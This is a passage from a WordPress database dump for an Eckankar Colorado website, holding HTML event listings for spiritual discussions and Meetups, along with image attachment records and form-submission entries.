20:06:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; color: #575757; font-size: 27px; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Central Colorado Public Calendar</p>\r\n<p>[MEC id=\"265023\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Central Colorado Public Calendar-mec','','publish','closed','closed','','central-colorado-public-calendar-mec','','','2022-05-23 22:08:50','2022-05-24 04:08:50','',0,'https://eckankar-colorado.org/?page_id=265024',0,'page','',0),(265026,2,'2021-05-14 14:06:11','2021-05-14 20:06:11',' ','','','publish','closed','closed','','265026','','','2021-05-14 14:06:11','2021-05-14 20:06:11','',0,'https://eckankar-colorado.org/265026/',35,'nav_menu_item','',0),(265030,2,'2023-10-20 09:43:11','2021-05-14 20:13:23','','Central Colorado Public Calendar','','publish','closed','closed','','265030','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=265030',3,'nav_menu_item','',0),(265037,2,'2021-05-15 13:22:54','2021-05-15 19:22:54','','blog-1','','inherit','closed','closed','','blog-1','','','2021-05-15 13:22:54','2021-05-15 19:22:54','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/05/blog-1.png',0,'attachment','image/png',0),(265043,2,'2021-05-16 09:03:46','2021-05-16 15:03:46','','eck-soul-adv-2','','inherit','closed','closed','','eck-soul-adv-2','','','2021-05-16 09:03:46','2021-05-16 15:03:46','',7160,'https://eckankar-colorado.org/wp-content/uploads/2021/05/eck-soul-adv-2.png',0,'attachment','image/png',0),(265063,2,'2021-05-19 15:05:36','2021-05-19 21:05:36','<p><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Discover your own spiritual greatness. “Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God,” says Sri Harold Klemp. </span></p>\r\n<p><span style=\"font-size: 14pt;\">Autobiography of a Modern Prophet is a special compilation of Sri Harold’s three autobiographical books—The Wind of Change, Soul Travelers of the Far Country, and Child in the Wilderness. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>\r\n<p><a class=\"reg3Button sg-popup-id-265444\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Today!</a></p>\r\n[sg_popup id=\"265444\" event=\"inherit\"][/sg_popup]','Loveland - Book Discussion<br>Autobiography of a Modern Prophet','','draft','closed','closed','','373','','','2022-03-22 10:04:12','2022-03-22 16:04:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265063',0,'mec-events','',0),(265064,2,'2021-05-19 08:54:44','2021-05-19 14:54:44','','Autobiography of a Modern Prophet','','inherit','closed','closed','','autobiography-of-a-modern-prophet','','','2021-05-19 08:54:44','2021-05-19 14:54:44','',265063,'https://eckankar-colorado.org/wp-content/uploads/2021/05/Autobiography-of-a-Modern-Prophet.jpg',0,'attachment','image/jpeg',0),(265068,2,'2021-05-19 15:14:10','2021-05-19 21:14:10','','','','publish','closed','closed','','265068','','','2021-05-19 15:14:10','2021-05-19 21:14:10','',0,'https://eckankar-colorado.org/nf_sub/265068/',0,'nf_sub','',0),(265069,2,'2021-05-19 15:16:04','2021-05-19 21:16:04','','','','publish','closed','closed','','265069','','','2021-05-19 15:16:04','2021-05-19 21:16:04','',0,'https://eckankar-colorado.org/nf_sub/265069/',0,'nf_sub','',0),(265070,2,'2021-05-19 15:18:10','2021-05-19 21:18:10','','','','publish','closed','closed','','265070','','','2021-05-19 15:18:10','2021-05-19 21:18:10','',0,'https://eckankar-colorado.org/nf_sub/265070/',0,'nf_sub','',0),(265071,2,'2021-05-19 16:12:48','2021-05-19 22:12:48','','','','publish','closed','closed','','265071','','','2021-05-19 16:12:48','2021-05-19 22:12:48','',0,'https://eckankar-colorado.org/nf_sub/265071/',0,'nf_sub','',0),(265084,2,'2021-05-21 20:40:27','2021-05-22 02:40:27','','loveland-location-page-sized-1','','inherit','closed','closed','','loveland-location-page-sized-1','','','2021-05-21 20:40:27','2021-05-22 02:40:27','',32074,'https://eckankar-colorado.org/wp-content/uploads/2021/05/loveland-location-page-sized-1.jpg',0,'attachment','image/jpeg',0),(265085,2,'2021-05-21 20:42:09','2021-05-22 02:42:09','','loveland-location-page-sized-2','','inherit','closed','closed','','loveland-location-page-sized-2','','','2021-05-21 20:42:09','2021-05-22 02:42:09','',32074,'https://eckankar-colorado.org/wp-content/uploads/2021/05/loveland-location-page-sized-2.jpg',0,'attachment','image/jpeg',0),(265089,2,'2021-05-21 20:57:14','2021-05-22 02:57:14','','','','publish','closed','closed','','265089','','','2021-05-21 20:57:14','2021-05-22 02:57:14','',0,'https://eckankar-colorado.org/nf_sub/265089/',0,'nf_sub','',0),(265091,2,'2021-05-22 09:48:18','2021-05-22 15:48:18','<p><span style=\"font-size: 14pt; color: #f28a27;\"><strong><span style=\"font-size: 20pt;\">Experience Divine Love through the Light and Sound of God</span></strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join us for a spiritual discussion on the Sacred Light and Sound and how to discover this divine language, which can be seen, heard, and felt through dreams, intuition, gratitude, and the love we have for our families and others.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">We will discuss how to recognize and then strengthen our connections with audible and visible expressions of the Life Force (the ECK).</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The discussion will be based on the following webpage on the sacred \'Light and Sound\', which gives insights, stories, and spiritual exercises for connecting with this divine language: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/experience/light-and-sound/\" href=\"https://www.eckankar.org/experience/light-and-sound/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Light and Sound - Webpage</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">We welcome you to explore this page before the Meetup, and look forward to exchanging insights and experiences with the Light and Sound in our lives and how we can become more consciously aware of them!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom meeting link will be provided to those who RSVP that they are attending.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This ‘Light and Sound - the Divine Language’ Meetup is the fifth of six topics in the \'A JOURNEY LIKE NO OTHER’ series, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">If you have not attended previous sessions in the series, want to know what the remaining sessions will contain, or for an overview orientation of the entire series <a href=\"https://www.meetup.com/SEGofAurora/events/277003273/\" target=\"_blank\" rel=\"noopener\">Click Here</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">We invite you, and welcome you, to attend any one, or any combination, of the Meetups in the ‘A JOURNEY LIKE NO OTHER’ series.</span></p>\r\n<p><span style=\"font-size: 14pt;\">For spiritual keys that can help you create a more rich and fulfilling life, </span><span style=\"font-size: 14pt;\">go to \'<a href=\"https://www.meetup.com/SEGofAurora/events/278247836/\" target=\"_blank\" rel=\"noopener\">Online ECKANKAR Soul Adventure—Spiritual Keys for a Happier Life</a>\'</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/278339503/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>\'Light and Sound - the Divine Language’<br>‘A JOURNEY LIKE NO OTHER’ series','','publish','closed','closed','','meetup-online-eventtemplate-995','','','2021-05-22 09:59:06','2021-05-22 15:59:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265091',0,'mec-events','',0),(265094,0,'2021-05-26 04:14:55','2021-05-26 10:14:55','','','','publish','closed','closed','','265094','','','2021-05-26 04:14:55','2021-05-26 10:14:55','',0,'https://eckankar-colorado.org/nf_sub/265094/',0,'nf_sub','',0),(265095,2,'2021-05-26 13:12:01','2021-05-26 19:12:01','<p><span style=\"color: #f28a27;\"><strong><span style=\"font-size: 18pt;\">How do you become a light in the darkness?</span></strong></span><br />\r\n<strong><span style=\"font-size: 18pt; color: #f28a27;\">Do you wonder how you can best be a light of God?</span></strong><br />\r\n<strong><span style=\"font-size: 18pt; color: #f28a27;\">Would you like to better understand your Divine purpose?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>The Awakened Heart</em>, <br />\r\n<br />\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #f28a27; margin-top: -15px; margin-left: 20px;\"><span style=\"font-size: 14pt;\">“The true spiritual path is always working for the betterment of you and everyone around you.”</span></blockquote>\r\n<p><span style=\"font-size: 14pt;\">In this world, when one person is uplifted, we are all uplifted in some way. During this Meetup, we will explore ways to fill yourself with God’s love and then allow that love to shine through you. We will be using exercises to help you discover ways to do this. The evening will also include contemplation and discussion. Our goal is to help people see how to be a living example of Divine Love in their own unique way.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/278422814/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT <br>\'12 Secrets of Spiritual Living: Become a Light to the World\'','','publish','closed','closed','','meetup-online-eventtemplate-382','','','2021-05-26 13:21:16','2021-05-26 19:21:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265095',0,'mec-events','',0),(265096,2,'2021-05-26 13:13:01','2021-05-26 19:13:01','','child-beach-1','','inherit','closed','closed','','child-beach-1','','','2021-05-26 13:13:01','2021-05-26 19:13:01','',265095,'https://eckankar-colorado.org/wp-content/uploads/2021/05/child-beach-1.jpg',0,'attachment','image/jpeg',0),(265099,0,'2021-05-27 05:09:49','2021-05-27 11:09:49','','','','publish','closed','closed','','265099','','','2021-05-27 05:09:49','2021-05-27 11:09:49','',0,'https://eckankar-colorado.org/nf_sub/265099/',0,'nf_sub','',0),(265101,0,'2021-05-30 23:17:47','2021-05-31 05:17:47','','','','publish','closed','closed','','265101','','','2021-05-30 23:17:47','2021-05-31 05:17:47','',0,'https://eckankar-colorado.org/nf_sub/265101/',0,'nf_sub','',0),(265103,0,'2021-06-01 03:39:11','2021-06-01 09:39:11','','','','publish','closed','closed','','265103','','','2021-06-01 03:39:11','2021-06-01 09:39:11','',0,'https://eckankar-colorado.org/nf_sub/265103/',0,'nf_sub','',0),(265105,2,'2021-06-01 07:06:35','2021-06-01 13:06:35','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 18pt;\">Would you like to help your child connect to the divine within, learn to love themselves and others more, and understand their dreams?</span></strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">If so, you are invited to attend the first in a series of<em> three spiritual discussions</em> especially for families. The first will focus on talking about dreams with your family. </span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>The next two discussions are:</strong><br />\r\n<em>\'Creating a Spiritual Home for Your Family\'</em> to be held on Sunday, July 25<br />\r\n<em>\'The Spiritual Gift of Relationships\'</em> to be held on Sunday, August 22. You are welcome to attend one or all.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Learning about and discussing dreams is a wonderful way to build a spiritual connection with children and family members. Dreams can help us see what is happening in our lives from a spiritual perspective and help us plan for the future.</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #f28a27; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“As Soul, as a divine light of God, your purpose in this life is to develop love and compassion and all the other divine qualities that make you a better instrument of Divine Spirit. Where and how do you learn this? You learn this at home, working things out with your family.”</span><br />\r\n<span style=\"font-size: 14pt; color: #666666;\">— Harold Klemp, <a class=\"link\" title=\"www.eckankar.org/explore/parents-families\" href=\"http://www.eckankar.org/explore/parents-families\" target=\"_blank\" rel=\"nofollow noopener ugc\">Parents &amp; Families</a></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\"><strong><br />\r\nIn this session we will discuss:</strong></span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">The different types of dreams</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Tools for remembering your dreams including a spiritual exercise you can do with your family</span></li>\r\n	<li><span style=\"font-size: 14pt;\">The benefits of discussing dreams as a family</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Resources for continuing your study</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">TheSoundofSoul.org</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">You can also explore our Parents and Families resources at <a class=\"link\" title=\"www.eckankar.org/explore/parents-families\" href=\"http://www.eckankar.org/explore/parents-families\" target=\"_blank\" rel=\"nofollow noopener ugc\">Parents &amp; Families</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/278519366/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>\'Talking with Your Family About Dreams\'','','publish','closed','closed','','meetup-online-eventtemplate-392','','','2021-06-01 07:36:35','2021-06-01 13:36:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265105',0,'mec-events','',0);
INSERT INTO `wpcl_posts` VALUES (265106,2,'2021-06-01 07:05:41','2021-06-01 13:05:41','','father-child-1','','inherit','closed','closed','','father-child-1','','','2021-06-01 07:05:41','2021-06-01 13:05:41','',265105,'https://eckankar-colorado.org/wp-content/uploads/2021/06/father-child-1.jpg',0,'attachment','image/jpeg',0),(265108,2,'2021-06-01 07:45:27','2021-06-01 13:45:27','','phon-1e','','inherit','closed','closed','','phon-1e','','','2021-06-01 07:45:27','2021-06-01 13:45:27','',264977,'https://eckankar-colorado.org/wp-content/uploads/2021/05/phon-1e.jpg',0,'attachment','image/jpeg',0),(265111,0,'2021-06-02 08:47:43','2021-06-02 14:47:43','','','','publish','closed','closed','','265111','','','2021-06-02 08:47:43','2021-06-02 14:47:43','',0,'https://eckankar-colorado.org/nf_sub/265111/',0,'nf_sub','',0),(265113,2,'2021-06-02 10:12:51','2021-06-02 16:12:51','','2021-May-ESC-Seminar-2--EXTENDED','','inherit','closed','closed','','2021-may-esc-seminar-2-extended','','','2021-06-02 10:12:51','2021-06-02 16:12:51','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/06/2021-May-ESC-Seminar-2-EXTENDED.jpg',0,'attachment','image/jpeg',0),(265115,2,'2021-06-02 10:21:04','2021-06-02 16:21:04','','2021-May-ESC-Seminar-2--EXTENDED-2','','inherit','closed','closed','','2021-may-esc-seminar-2-extended-2','','','2021-06-02 10:21:04','2021-06-02 16:21:04','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/06/2021-May-ESC-Seminar-2-EXTENDED-2.jpg',0,'attachment','image/jpeg',0),(265116,2,'2021-06-02 10:26:20','2021-06-02 16:26:20','','2021-May-ESC-Seminar-2--EXTENDED-3','','inherit','closed','closed','','2021-may-esc-seminar-2-extended-3','','','2021-06-02 10:26:20','2021-06-02 16:26:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/06/2021-May-ESC-Seminar-2-EXTENDED-3.jpg',0,'attachment','image/jpeg',0),(265121,0,'2021-06-05 14:19:03','2021-06-05 20:19:03','','','','publish','closed','closed','','265121','','','2021-06-05 14:19:03','2021-06-05 20:19:03','',0,'https://eckankar-colorado.org/nf_sub/265121/',0,'nf_sub','',0),(265122,0,'2021-06-07 08:40:35','2021-06-07 14:40:35','','','','publish','closed','closed','','265122','','','2021-06-07 08:40:35','2021-06-07 14:40:35','',0,'https://eckankar-colorado.org/nf_sub/265122/',0,'nf_sub','',0),(265124,0,'2021-06-10 01:03:13','2021-06-10 07:03:13','','','','publish','closed','closed','','265124','','','2021-06-10 01:03:13','2021-06-10 07:03:13','',0,'https://eckankar-colorado.org/nf_sub/265124/',0,'nf_sub','',0),(265125,0,'2021-06-13 02:14:31','2021-06-13 08:14:31','','','','publish','closed','closed','','265125','','','2021-06-13 02:14:31','2021-06-13 08:14:31','',0,'https://eckankar-colorado.org/nf_sub/265125/',0,'nf_sub','',0),(265126,0,'2021-06-13 10:35:18','2021-06-13 16:35:18','','','','publish','closed','closed','','265126','','','2021-06-13 10:35:18','2021-06-13 16:35:18','',0,'https://eckankar-colorado.org/nf_sub/265126/',0,'nf_sub','',0),(265127,0,'2021-06-15 06:27:50','2021-06-15 12:27:50','','','','publish','closed','closed','','265127','','','2021-06-15 06:27:50','2021-06-15 12:27:50','',0,'https://eckankar-colorado.org/nf_sub/265127/',0,'nf_sub','',0),(265131,0,'2021-06-16 23:03:04','2021-06-17 05:03:04','','','','publish','closed','closed','','265131','','','2021-06-16 23:03:04','2021-06-17 05:03:04','',0,'https://eckankar-colorado.org/nf_sub/265131/',0,'nf_sub','',0),(265134,2,'2021-06-17 08:48:59','2021-06-17 14:48:59','<p><span style=\"font-size: 20pt; color: #333333;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #333333; font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></span></p>\r\n<!-- REGISTER BUTTON CODE -->\r\n<p><a class=\"reg3Button sg-popup-id-264853\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<!-- END REGISTER BUTTON CODE -->','Experience the Sound Of Soul','','publish','closed','closed','','sound-of-soul-zoom-online-template-mec-582','','','2021-06-17 08:48:59','2021-06-17 14:48:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265134',0,'mec-events','',0),(265135,2,'2021-06-17 08:47:52','2021-06-17 14:47:52','','bookdisc-notext-2021','','inherit','closed','closed','','bookdisc-notext-2021','','','2021-06-17 08:47:52','2021-06-17 14:47:52','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/bookdisc-notext-2021.jpg',0,'attachment','image/jpeg',0),(265136,2,'2021-06-17 08:47:54','2021-06-17 14:47:54','','elss-notext-2021','','inherit','closed','closed','','elss-notext-2021','','','2021-06-17 08:47:54','2021-06-17 14:47:54','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/elss-notext-2021.jpg',0,'attachment','image/jpeg',0),(265137,2,'2021-06-17 08:47:56','2021-06-17 14:47:56','','generic-event-notext-2021','','inherit','closed','closed','','generic-event-notext-2021','','','2021-06-17 08:47:56','2021-06-17 14:47:56','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/generic-event-notext-2021.jpg',0,'attachment','image/jpeg',0),(265138,2,'2021-06-17 08:47:57','2021-06-17 14:47:57','','rountable-notext-2021','','inherit','closed','closed','','rountable-notext-2021','','','2021-06-17 08:47:57','2021-06-17 14:47:57','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/rountable-notext-2021.jpg',0,'attachment','image/jpeg',0),(265139,2,'2021-06-17 08:47:59','2021-06-17 14:47:59','','satsang-class-notext-2021','','inherit','closed','closed','','satsang-class-notext-2021','','','2021-06-17 08:47:59','2021-06-17 14:47:59','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/satsang-class-notext-2021.jpg',0,'attachment','image/jpeg',0),(265140,2,'2021-06-17 08:48:01','2021-06-17 14:48:01','','sos-notext-2021','','inherit','closed','closed','','sos-notext-2021','','','2021-06-17 08:48:01','2021-06-17 14:48:01','',265134,'https://eckankar-colorado.org/wp-content/uploads/2021/06/sos-notext-2021.jpg',0,'attachment','image/jpeg',0),(265142,2,'2021-06-17 09:20:31','2021-06-17 15:20:31','','gold-waterfall-1','','inherit','closed','closed','','gold-waterfall-1','','','2021-06-17 09:20:31','2021-06-17 15:20:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/06/gold-waterfall-1.jpg',0,'attachment','image/jpeg',0),(265148,2,'2021-06-17 09:34:50','2021-06-17 15:34:50','','','','publish','closed','closed','','265148','','','2021-06-17 09:34:50','2021-06-17 15:34:50','',0,'https://eckankar-colorado.org/nf_sub/265148/',0,'nf_sub','',0),(265151,2,'2021-06-17 09:41:31','2021-06-17 15:41:31','','','','publish','closed','closed','','265151','','','2021-06-17 09:41:31','2021-06-17 15:41:31','',0,'https://eckankar-colorado.org/nf_sub/265151/',0,'nf_sub','',0),(265152,2,'2021-06-17 09:46:24','2021-06-17 15:46:24','','','','publish','closed','closed','','265152','','','2021-06-17 09:46:24','2021-06-17 15:46:24','',0,'https://eckankar-colorado.org/nf_sub/265152/',0,'nf_sub','',0),(265158,0,'2021-06-18 07:59:08','2021-06-18 13:59:08','','','','publish','closed','closed','','265158','','','2021-06-18 07:59:08','2021-06-18 13:59:08','',0,'https://eckankar-colorado.org/nf_sub/265158/',0,'nf_sub','',0),(265159,2,'2021-06-19 09:12:17','2021-06-19 15:12:17','<blockquote class=\"bg-blockquote border\" style=\"border-color: #1D5791; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The purpose of life is to become a Coworker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>Past Lives, Dreams and Soul Travel</em>, p. 17</span></p>\r\n</blockquote>\r\n<p><strong><span style=\"font-size: 16pt;\">What is the secret to living a spiritually vibrant and meaningful life? </span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul! Become a creative expression of divine love, serving all life with gratitude and joy.</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">In this spiritual discussion we will look at ways you may answer these questions:</span><br />\r\n<br />\r\n<em><span style=\"font-size: 14pt;\">When do I feel the most fulfilled, the most grateful?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">When do I feel the most creative?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">When do I feel the most connected to my true self and life around me?</span></em><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is also an e-booklet available online: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Life\'s Spiritual Purpose</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are invited to attend! This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofBV/events/278514016/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - \'Finding Your Spiritual Purpose\'','','publish','closed','closed','','meetup-online-eventtemplate-515','','','2021-06-19 09:18:39','2021-06-19 15:18:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265159',0,'mec-events','',0),(265160,2,'2021-06-19 09:11:57','2021-06-19 15:11:57','','hiking-path-1','','inherit','closed','closed','','hiking-path-1','','','2021-06-19 09:11:57','2021-06-19 15:11:57','',265159,'https://eckankar-colorado.org/wp-content/uploads/2021/06/hiking-path-1.jpg',0,'attachment','image/jpeg',0),(265162,0,'2021-06-19 22:32:36','2021-06-20 04:32:36','','','','publish','closed','closed','','265162','','','2021-06-19 22:32:36','2021-06-20 04:32:36','',0,'https://eckankar-colorado.org/nf_sub/265162/',0,'nf_sub','',0),(265163,0,'2021-06-19 22:56:35','2021-06-20 04:56:35','','','','publish','closed','closed','','265163','','','2021-06-19 22:56:35','2021-06-20 04:56:35','',0,'https://eckankar-colorado.org/nf_sub/265163/',0,'nf_sub','',0),(265164,0,'2021-06-22 12:47:14','2021-06-22 18:47:14','','','','publish','closed','closed','','265164','','','2021-06-22 12:47:14','2021-06-22 18:47:14','',0,'https://eckankar-colorado.org/nf_sub/265164/',0,'nf_sub','',0),(265165,0,'2021-06-23 11:45:33','2021-06-23 17:45:33','','','','publish','closed','closed','','265165','','','2021-06-23 11:45:33','2021-06-23 17:45:33','',0,'https://eckankar-colorado.org/nf_sub/265165/',0,'nf_sub','',0),(265166,2,'2021-06-24 14:15:55','2021-06-24 20:15:55','<p><strong><span style=\"font-size: 15pt;\">What is the spiritual significance of dreams?<br />\r\n</span></strong><strong><span style=\"font-size: 15pt;\">Can my dreams open the line of communication between the higher worlds and my physical self?<br />\r\n</span></strong><strong><span style=\"font-size: 15pt;\">Do my dreams reflect what is going on with me?</span></strong></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“One of the ways to begin working out the inner tangles and knots, where the communication lines between the higher worlds and the physical have been twisted, is to work with the dream journal. And as you write, you will find that the tension in your stomach goes away. If the dream journal can help to do this, it’s done something.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Excerpt from the ECKANKAR Blog - \"<em><a href=\"https://www.eckankar.org/how-to-remember-and-interpret-your-dreams\" target=\"_blank\" rel=\"noopener\">How to Remember and Interpret Your Dreams</a>\".</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">During this open discussion, you may learn about dream symbols that are personal and unique to you; creating your own dream dictionary; and interpreting your dreams. Is the dream about my daily life? My emotions and thoughts? Or about my pure spiritual side?</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are welcome to participate in this online spiritual discussion for learning insight from dreams. Seekers can discuss dream experiences; hear others share insights they gained through dream symbols; and keeping a dream journal. Learn how Divine Spirit can speak to us through dreams. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The ECKANKAR Blog titled, “<em><a href=\"https://www.eckankar.org/how-to-remember-and-interpret-your-dreams.\" target=\"_blank\" rel=\"noopener\">How to Remember and Interpret Your Dreams</a></em>” includes stories from people who have learned how to interpret their dream symbols and tips to interpret dreams. This free publication can be viewed or downloaded from the link listed above.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/279046256/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>\'How to Remember and Interpret Your Dreams\'','','publish','closed','closed','','meetup-online-eventtemplate-725','','','2021-06-24 14:26:27','2021-06-24 